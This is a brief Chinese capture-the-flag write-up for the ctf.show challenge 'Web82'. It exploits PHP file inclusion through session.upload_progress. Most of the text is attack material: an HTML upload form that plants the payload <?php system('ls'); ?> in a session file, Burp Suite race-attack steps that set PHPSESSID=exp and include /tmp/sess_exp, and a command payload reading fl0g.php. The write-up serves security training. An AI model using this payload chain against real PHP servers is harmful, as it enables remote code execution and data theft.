Web82
利用 session.upload_progress 包含文件漏洞
<!DOCTYPE html>
<html>
<body>
<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
修改url地址,修改命令
上传文件bp抓包

添加cookie,清除参数
Cookie: PHPSESSID=exp

?file=/tmp/sess_exp
抓包发送到攻击模块


开始攻击

<?php system('cat fl0g.php'); ?>
